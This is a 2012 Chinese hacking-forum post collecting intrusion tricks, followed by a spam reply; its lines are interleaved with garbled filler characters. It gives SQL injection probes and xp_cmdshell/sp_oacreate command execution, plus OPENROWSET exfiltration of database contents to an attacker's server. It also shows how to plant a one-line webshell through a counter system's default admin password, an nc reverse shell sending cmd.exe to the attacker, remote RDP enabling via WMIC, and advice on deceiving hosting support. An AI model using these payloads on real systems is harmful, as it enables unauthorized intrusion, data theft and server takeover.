找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3663|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关# R0 E2 q3 ^  J% d+ E1 N' _
! v# ^6 T# j& n& {
* p5 b2 U/ ]4 T
SA点数据库分离搞法+语句:
1 I4 R, E! n+ O5 ^% l2 M+ ~& d: |' U: ?1 y& I
注射点不显错,执行下面三条语句页面都返回正常。% i- A( i, p) ?
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')+ `( l0 b* k) D; E
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')8 s3 _0 Q' k( j; E" V, w8 ~4 s% a1 g
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')4 q3 J# I, V1 Y6 O
可以列目录,判断系统为2000,web与数据库分离2 O9 ?( J: a# d; a+ ?
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。7 m0 @' |9 _& {" K0 u$ i2 m
在注射点上执行( ]+ p/ H  i" F) }8 u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--) a' L! e+ f! j4 h% K
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP" i( t: S0 ]% z* m, K5 P5 p
还有我用NC监听得其他端口都没有得到IP。# ]: S, T* J! N+ |) k

$ ~7 O, P' ~' T# I- f- }: k: X- k& ~通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。/ E% w3 X4 v; O# R) z0 G: x5 Z# U
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--+ M# i! i7 n  s) b8 @4 E% H* B, y( k
4 s3 K4 M1 \/ u( h8 N/ l* J
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--! @6 F4 g) U) G: P1 d/ a+ n& K

+ b& E$ _  x, G8 ]& |. H现在就猜想是不是数据库是内网而且不能连外网。
! f: l& U0 N# h' w" V. S! m& ]( ?+ z; a& n6 \, V9 F

" f: w. \( k7 A  m9 Haccess导出txt文本代码
# V( R8 P. C+ E8 c' ~9 Q% U( NSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
/ ^: k, B: \' a$ z0 L( g( a0 d0 w7 |
7 w8 d3 `2 s! B  R- k

7 s+ R; h1 F  E7 c9 u自动跳转到指定网站代码头4 B" S8 o) C9 U; r5 `; Q
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>" P- }1 c  P8 X6 l) T) ?( n) \; x
( s1 e. i$ ~3 l: N
0 l" l, s+ Q& _9 d7 T
入侵java or jsp站点时默认配置文件路径:  p* |9 m7 ~2 q' [8 I% t
\web-inf\web.xml/ G) X8 ^9 k5 C$ B: `' u# K& p
tomcat下的配置文件位置:
6 q5 X1 j" I- [6 J* H8 k7 k\conf\server.xml            (前面加上tomcat路径)
0 i0 A$ L; {/ F, j& D\Tomcat 5.0\webapps\root\web-inf\struts-config.xml$ G! ]4 l- z/ A" c1 f6 w0 ~  W

! L7 ^' V. F0 a: G) H
4 J2 b/ M/ r% k# D/ C* X, W# S0 M# r+ j. D
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
; @4 f% {- P7 B& j8 M-1%23
- D+ y0 n& p; ]) l" L>
$ f& r5 K3 N9 a$ g7 r# m<! S6 |0 u8 O( j8 A4 `. U, Q& A, C
1'+or+'1'='1
, B) d3 p( `5 M) H* t9 ~! \id=8%bf
& ~6 c: s! w6 j1 s1 @+ ~, Q6 N- \6 ]. X5 j  c7 [1 F
全新注入点检测试法:; C, p; o: _2 C, o
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
) n1 {6 e3 x. g/ e4 Q1 w0 z+ s  y" @) v
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
9 o# t  K" K6 o7 x/ [# B  H& [+ `% F9 H$ Z0 ]8 ~0 `
搜索型注入判断方法:
- B: c. ^* E2 {7 F/ v* G% n' b% U北京%' and '1'='1' and '%'='
2 @& |: @1 r0 W5 ?/ Y1 P北京%' and '1'='2' and '%'='* g! e8 K: @) a. G+ d1 M" b- ~
  F( f1 P: N, i8 y3 u, o

( |; m+ s$ y  s* v! aCOOKIES注入:  O3 y3 P" h' d. m4 _
% c% g; y9 j+ n; a6 b2 F
javascript:alert(document.cookie="id="+escape("51 and 1=1"));" x; v% X" \; ^0 b6 \  d1 z; y
% Z/ e" v3 @1 {" ?% I2 }
2000专业版查看本地登录用户命令:
) s8 F5 v2 O! f$ D. D7 Fnet config workstation
1 f6 ?. z( I' H3 n$ ^- J, g+ e2 x# V; e( d* w
( B2 p% y. m. E4 w( V. _4 R
2003下查看ipsec配置和默认防火墙配置命令:
% N$ n/ f, P+ l( _7 g- E( lnetsh firewall show config
$ p: X0 ]7 v  nnetsh ipsec static show all$ N: Z1 ^- M. U, O. I

9 M: J7 A! j0 z不指派指定策略命令:
  _9 ^' e# k) b. nnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)! R5 V6 Q" w4 k. {. L2 V9 B
netsh ipsec static show policy all  显示策略名
, `3 m) \2 S$ t8 V: ?  d/ i; r
7 ^5 T/ o; J0 u8 D1 j
8 M# D) [; A2 U6 N猜管理员后台小技巧:# J* F/ Y- Q" U5 W: t
admin/left.asp 9 Y3 M0 A& P* f+ i8 S9 `
admin/main.asp1 t7 }, b0 m; d' t
admin/top.asp& [8 D2 g/ r) z& b
admin/admin.asp
: F+ K- P4 S! g会现出菜单导航,然后迅雷下载全部链接
# v5 s/ X/ ^0 @* N- O+ q# T2 \
3 q) y% U& O0 h) A, w5 }# {! L* \" s- G' ~
社会工程学:
. n) c8 R1 T* |. |2 A9 n/ z' Q* @0 ~% g用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人3 _' f2 Z6 x% I4 g
然后去骗客服( A$ Q$ r) v; }. g3 q

& {/ a' X2 t$ p2 d1 `
; w" y# v3 c" F" o5 s统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ' p6 |5 h; Z* [; q/ r& }
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, % s2 e  Q3 O2 I  Q
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
  {4 d) [1 x$ b& K6 e0 L# L- y( W) y: U7 _" o
8 `2 z$ L0 A6 g7 P' D( n) f1 K2 X

/ S% f4 w, f: ~0 }& d, p( a: l6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查), O% |7 O& X4 Z  Q; P

* ^9 U: W) w1 W1 v# T+ C" l+ r3 f; T& W0 T: M, G* O/ L: _

% F+ N# U# i/ \* G' R# _7 d( p" OCMD加密注册表位置
+ b% A) k6 p. a4 w(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
2 h, }3 m1 s" p! T! ]AutoRun
8 S6 C9 x/ K2 e* A- U+ R' a9 O. e2 F
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
* c% G! i$ Y6 R3 [AutoRun/ l4 T- A- Z$ x4 O0 @$ C' @& G: ?
9 I! r5 Y0 z& R7 X9 }- v2 T
6 ?3 O" Q6 a6 o
在找注入时搜索Hidden,把他改成test! k/ k5 ?, E8 e. T

1 G8 v/ i+ n: _. ?' J* f: d8 B# D) ~* f% G: m% d3 n, H0 ^
. t4 E& @& J$ k" _0 f  c
mstsc /v:IP /console 3 d: g9 Z- w4 p% i% b9 w
" E: f. s9 B' r7 c

) ]/ c0 M1 v- l一句话开3389:
6 f3 k3 y% ~: C; [" i( E6 z* k. W3 W+ J7 r6 T
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  # K$ p& {  V* b  }. o5 V) ^
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
% X# A+ U9 M, r: Q5 f
6 q! x1 X! k: G9 T+ g, ^$ G9 N2 t8 t6 Q, n
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
. H' o- e3 f4 M0 X2 V; d0 }Insert into admin(user,pwd) values('test','test')
) W2 n) `' Y( M2 f$ I/ g; }0 Z  T2 ~  w

* v7 C/ ?) I4 B; ?% |NC反弹
- b1 A; E, ]1 ~1 @& w0 [, Q先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   2 {! G7 z. m, q! w* u& o
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
# g9 {& C6 I: _5 f# a+ d4 ~$ n
) A6 q- N' K3 o; I' Y0 Q( [; T$ `5 X
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
/ O4 E7 ?. W; |* r7 ]9 q+ r1 u- @2 V! ~
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
' D# e8 }+ E# G+ `/ P/ H4 O例如:
& C* u0 |9 a' ]& e8 s3 lsubst k: d:\www\ 用d盘www目录替代k盘
0 f& [3 T! E& _  x8 a& Isubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表